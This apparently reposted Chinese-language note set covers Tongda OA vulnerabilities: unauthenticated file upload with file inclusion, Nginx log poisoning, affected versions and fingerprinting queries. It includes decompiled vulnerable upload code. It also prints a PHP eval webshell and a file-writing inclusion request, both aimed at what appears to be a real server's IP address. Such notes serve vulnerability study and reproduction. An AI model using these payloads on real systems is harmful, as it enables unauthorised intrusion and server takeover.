通达OA
通达OA 网络智能办公系统 是由北京通达信科科技有限公司开发的一款办公系统
采用基于WEB的企业计算,
主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。
数据存取集中控制,避免了数据泄漏的可能。
提供数据备份工具,保护系统数据安全。
多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。
自主研发的协同办公自动化软件,
是与中国企业管理实践相结合形成的综合管理办公平台
2015年,通达云OA入驻阿里云企业应用专区,为众多中小企业提供稳定、可靠的云计算支撑
通达OA可供用户免费下载使用,安装简单,默认安装了Nginx、mysql等服务,
系统默认由System权限启动
360安全大脑-Quake网络空间测绘系统通过对全网资产测绘
1:未授权文件上传 + 文件包含姿势
2:Nginx日志 + 文件包含
http://www.360doc.com/content/20/0405/19/64353657_904057447.shtml
58.56.254.122:8081/<?php@eval($_POST['aming']);?>
http://cn-sec.com/archives/498043.html
http://58.56.254.122:8081/ispirit/interface/gateway.php?json={}&aa=<?php file_put_contents('1.php','hello world');?>
通达OA2017,V11.X<V11.5
通达oa远程命令执行:影响的版本有:V11版,2017版,2016版,2015版,2013增强版,2013版。
app=“通达OA” body=" static/images/tongda.ico"
https://blog.csdn.net/szgyunyun/article/details/107104288
https://blog.csdn.net/blue_fantasy/article/details/122403451
https://blog.csdn.net/weixin_44831109/article/details/123841373
https://blog.csdn.net/qq_29443517/article/details/106275093
CNVD:CNVD-2020-26562
未授权的情况下可上传图片木马文件
精心构造的请求进行文件包含,实现远程命令执行,且攻击者无须登陆认证即可完成攻击
影响范围
通达OA V11版 <= 11.3 20200103
通达OA 2017版 <= 10.19 20190522
通达OA 2016版 <= 9.13 20170710
通达OA 2015版 <= 8.15 20160722
通达OA 2013增强版 <= 7.25 20141211
通达OA 2013版 <= 6.20 20141017
V11版 2017版 2016版 2015版 2013增强版2013版
未授权上传文件
\ispirit\im\upload.php
<?php
set_time_limit(0);
$P = $_POST['P'];if(isset($P)|| $P !=''){ob_start();
include_once 'inc/session.php';session_id($P);session_start();session_write_close();}else{
include_once './auth.php';}
include_once 'inc/utility_file.php';
include_once 'inc/utility_msg.php';
include_once 'mobile/inc/funcs.php';ob_end_clean();
$TYPE = $_POST['TYPE'];
$DEST_UID = $_POST['DEST_UID'];
$dataBack =array();if($DEST_UID !=''&&!td_verify_ids($ids)){
$dataBack =array('status'=>0,'content'=>'-ERR '._('接收
方ID无效'));
echo json_encode(data2utf8($dataBack));
exit;}if(strpos($DEST_UID,',')!==false){}else{
$DEST_UID =intval($DEST_UID);}if($DEST_UID ==0){if($UPLOAD_MODE !=2){
$dataBack =array('status'=>0,'content'=>'-ERR '._('接收方ID无效'));
echo json_encode(data2utf8($dataBack));
exit;}}
$MODULE ='im';if(1<=count($_FILES)){if($UPLOAD_MODE =='1'){if(strlen(urldecode($_FILES['ATTACHMENT']['name']))!=strlen($_FILES['ATTACHMENT']['name'])){
$_FILES['ATTACHMENT']['name']=urldecode($_FILES['ATTACHMENT']['name']);}}
$ATTACHMENTS =upload('ATTACHMENT', $MODULE,false);if(!is_array($ATTACHMENTS)){
$dataBack =array('status'=>0,'content'=>'-ERR '.
$ATTACHMENTS);
echo json_encode(data2utf8($dataBack));
exit;}ob_end_clean();
$ATTACHMENT_ID =substr($ATTACHMENTS['ID'],0,-1);
$ATTACHMENT_NAME =substr($ATTACHMENTS['NAME'],0,-1);if($TYPE =='mobile'){
$ATTACHMENT_NAME =td_iconv(urldecode($ATTACHMENT_NAME),'utf-8', MYOA_CHARSET);}}else{
$dataBack =array('status'=>0,'content'=>'-ERR '._('无文
件上传'));
echo json_encode(data2utf8($dataBack));
exit;}
$FILE_SIZE =attach_size($ATTACHMENT_ID, $ATTACHMENT_NAME,
$MODULE);if(!$FILE_SIZE){
$dataBack =array('status'=>0,'content'=>'-ERR '._('文件
上传失败'));
echo json_encode(data2utf8($dataBack));
exit;}if($UPLOAD_MODE =='1'){if(is_thumbable($ATTACHMENT_NAME)){
$FILE_PATH =attach_real_path($ATTACHMENT_ID,
$ATTACHMENT_NAME, $MODULE);
$THUMB_FILE_PATH =substr($FILE_PATH,0,strlen($FILE_PATH)-strlen($ATTACHMENT_NAME)).'thumb_'. $ATTACHMENT_NAME;CreateThumb($FILE_PATH,320,240, $THUMB_FILE_PATH);}
$P_VER =is_numeric($P_VER)?intval($P_VER):0;
$MSG_CATE = $_POST['MSG_CATE'];if($MSG_CATE =='file'){
$CONTENT ='[fm]'. $ATTACHMENT_ID .'|'.
$ATTACHMENT_NAME .'|'. $FILE_SIZE .'[/fm]';}else{if($MSG_CATE =='image'){
$CONTENT ='[im]'. $ATTACHMENT_ID .'|'.
$ATTACHMENT_NAME .'|'. $FILE_SIZE .'[/im]';}else{
$DURATION =intval($DURATION);
$CONTENT ='[vm]'. $ATTACHMENT_ID .'|'.
$ATTACHMENT_NAME .'|'. $DURATION .'[/vm]';}}
$AID =0;
$POS =strpos($ATTACHMENT_ID,'@');if($POS !==false){
$AID =intval(substr($ATTACHMENT_ID,0, $POS));}
$query = 'INSERT INTO im_offline_file(TIME,SRC_UID,DEST_UID,FILE_NAME,FILE_SIZE,FLAG,AID)values(\''.date('Y-m-d H:i:s').'\',\''.
$_SESSION['LOGIN_UID'].'\',\''. $DEST_UID .'\',\'*'. $ATTACHMENT_ID .'.'.
$ATTACHMENT_NAME .'\',\''. $FILE_SIZE .'\',\'0\',\''.
$AID
.'\')';
$cursor =exequery(TD::conn(), $query);
$FILE_ID =mysql_insert_id();if($cursor ===false){
$dataBack =array('status'=>0,'content'=>'-ERR '._('数据库操作失败'));
echo json_encode(data2utf8($dataBack));
exit;}
$dataBack =array('status'=>1,'content'=> $CONTENT,'file_id'=> $FILE_ID);
echo json_encode(data2utf8($dataBack));
exit;}else{if($UPLOAD_MODE =='2'){
$DURATION =intval($_POST['DURATION']);
$CONTENT ='[vm]'. $ATTACHMENT_ID .'|'.
$ATTACHMENT_NAME .'|'. $DURATION .'[/vm]';
$query = 'INSERT INTO WEIXUN_SHARE(UID, CONTENT,
ADDTIME)VALUES(\''. $_SESSION['LOGIN_UID'].'\', \''.
$CONTENT
.'\', \''.time().'\')';
$cursor =exequery(TD::conn(), $query);
echo '+OK '. $CONTENT;}else{if($UPLOAD_MODE =='3'){if(is_thumbable($ATTACHMENT_NAME)){
$FILE_PATH =attach_real_path($ATTACHMENT_ID,
$ATTACHMENT_NAME, $MODULE);
$THUMB_FILE_PATH =substr($FILE_PATH,0,strlen($FILE_PATH)-strlen($ATTACHMENT_NAME)).'thumb_'. $ATTACHMENT_NAME;CreateThumb($FILE_PATH,320,240,
$THUMB_FILE_PATH);}
echo '+OK '. $ATTACHMENT_ID;}else{
$CONTENT ='[fm]'. $ATTACHMENT_ID .'|'.
$ATTACHMENT_NAME .'|'. $FILE_SIZE .'[/fm]';
$msg_id =send_msg($_SESSION['LOGIN_UID'],
$DEST_UID,1, $CONTENT,'',2);
$query = 'insert into IM_OFFLINE_FILE(TIME,SRC_UID,DEST_UID,FILE_NAME,FILE_SIZE,FLAG)values(\''.date('Y-m-d H:i:s').'\',\''.
$_SESSION['LOGIN_UID'].'\',\''. $DEST_UID .'\',\'*'. $ATTACHMENT_ID .'.'. $ATTACHMENT_NAME
.'\',\''. $FILE_SIZE .'\',\'0\')';
$cursor =exequery(TD::conn(), $query);
$FILE_ID =mysql_insert_id();if($cursor ===false){
echo '-ERR '._('数据库操作失败');
exit;}if($FILE_ID ==0){
echo '-ERR '._('数据库操作失败2');
exit;}
echo '+OK ,'. $FILE_ID .','. $msg_id;
exit;}}}
源码采用了zend加密,解密后才能正常阅读代码
第一个if(第5行)对P进行了判断,只要传递了参数P或者不为空,就可以进入下面的语句,
如果判断失败,就进入else,也就是身份认证功能
function upload($PREFIX ='ATTACHMENT', $MODULE ='', $OUTPUT =true){if(strstr($MODULE,'/')||strstr($MODULE,'\\')){if(!$OUTPUT){return_('参数含有非法字符。');}Message(_('错误'),_('参数含有非法字符。'));
exit;}
$ATTACHMENTS =array('ID'=>'','NAME'=>'');reset($_FILES);foreach($_FILES as $KEY => $ATTACHMENT){if($ATTACHMENT['error']==4|| $KEY != $PREFIX &&substr($KEY,0,strlen($PREFIX)+1)!= $PREFIX .'_'){continue;}
$data_charset =isset($_GET['data_charset'])?
$_GET['data_charset']:(isset($_POST['data_charset'])?
$_POST['data_charset']:'');
$ATTACH_NAME = $data_charset !=''?td_iconv($ATTACHMENT['name'], $data_charset,
MYOA_CHARSET): $ATTACHMENT['name'];
$ATTACH_SIZE = $ATTACHMENT['size'];
$ATTACH_ERROR = $ATTACHMENT['error'];
$ATTACH_FILE = $ATTACHMENT['tmp_name'];
$ERROR_DESC ='';if($ATTACH_ERROR == UPLOAD_ERR_OK){if(!is_uploadable($ATTACH_NAME)){
$ERROR_DESC =sprintf(_('禁止上传后缀名为[%s]的文
件'),substr($ATTACH_NAME,strrpos($ATTACH_NAME,'.')+1));}
$encode =mb_detect_encoding($ATTACH_NAME,array('ASCII','UTF-8','GB2312','GBK','BIG5'));if($encode !='UTF-8'){
$ATTACH_NAME_UTF8 =mb_convert_encoding($ATTACH_NAME,'utf-8',
MYOA_CHARSET);}else{
$ATTACH_NAME_UTF8 = $ATTACH_NAME;}if(preg_match('/[\\\':<>?]|\\/|\\\\|"|\\|/u',
$ATTACH_NAME_UTF8)){
$ERROR_DESC =sprintf(_('文件名[%s]包含
[/\\\'":*?<>|]等非法字符'), $ATTACH_NAME);}if($ATTACH_SIZE ==0){
$ERROR_DESC =sprintf(_('文件[%s]大小为0字节'),
$ATTACH_NAME);}if($ERROR_DESC ==''){
$ATTACH_NAME =str_replace('\'','',
$ATTACH_NAME);
$ATTACH_ID =add_attach($ATTACH_FILE,
$ATTACH_NAME, $MODULE);if($ATTACH_ID ===false){
$ERROR_DESC =sprintf(_('文件[%s]上传失败'),
$ATTACH_NAME);}else{
$ATTACHMENTS['ID'].= $ATTACH_ID .',';
$ATTACHMENTS['NAME'].= $ATTACH_NAME .'*';}}
@unlink($ATTACH_FILE);}else{if($ATTACH_ERROR == UPLOAD_ERR_INI_SIZE){
$ERROR_DESC =sprintf(_('文件[%s]的大小超过了系统
限制
(%s)'), $ATTACH_NAME, ini_get('upload_max_filesize'));}else{if($ATTACH_ERROR == UPLOAD_ERR_FORM_SIZE){
$ERROR_DESC =sprintf(_('文件[%s]的大小超过
了表
单限制'), $ATTACH_NAME);}else{if($ATTACH_ERROR == UPLOAD_ERR_PARTIAL){
$ERROR_DESC =sprintf(_('文件[%s]上传不
完整'), $ATTACH_NAME);}else{if($ATTACH_ERROR ==
UPLOAD_ERR_NO_TMP_DIR){
$ERROR_DESC =sprintf(_('文件[%s]上
传失败:找不到临时文件夹'),
$ATTACH_NAME);}else{if($ATTACH_ERROR == U
PLOAD_ERR_CANT_WRITE){
$ERROR_DESC =sprintf(_('文件
[%s]写入失败'), $ATTACH_NAME);}else{
$ERROR_DESC =sprintf(_('未知错
误[代码:%s]'), $ATTACH_ERROR);}}}}}}if($ERROR_DESC !=''){if(!$OUTPUT){delete_attach($ATTACHMENTS['ID'],
$ATTACHMENTS['NAME'], $MODULE);return $ERROR_DESC;}else{Message(_('错误'), $ERROR_DESC);}}}return $ATTACHMENTS;}
https://blog.csdn.net/weixin_45728976/article/details/105166034
https://blog.csdn.net/hackzkaq/article/details/115900500
11.5 sql注入漏洞复现
前提登录
https://www.csdn.net/tags/MtTaEgwsMTU3NzMzLWJsb2cO0O0O.html
2017 11.x<11.5任意用户未授权
版权归原作者 amingMM 所有, 如有侵权,请联系我们删除。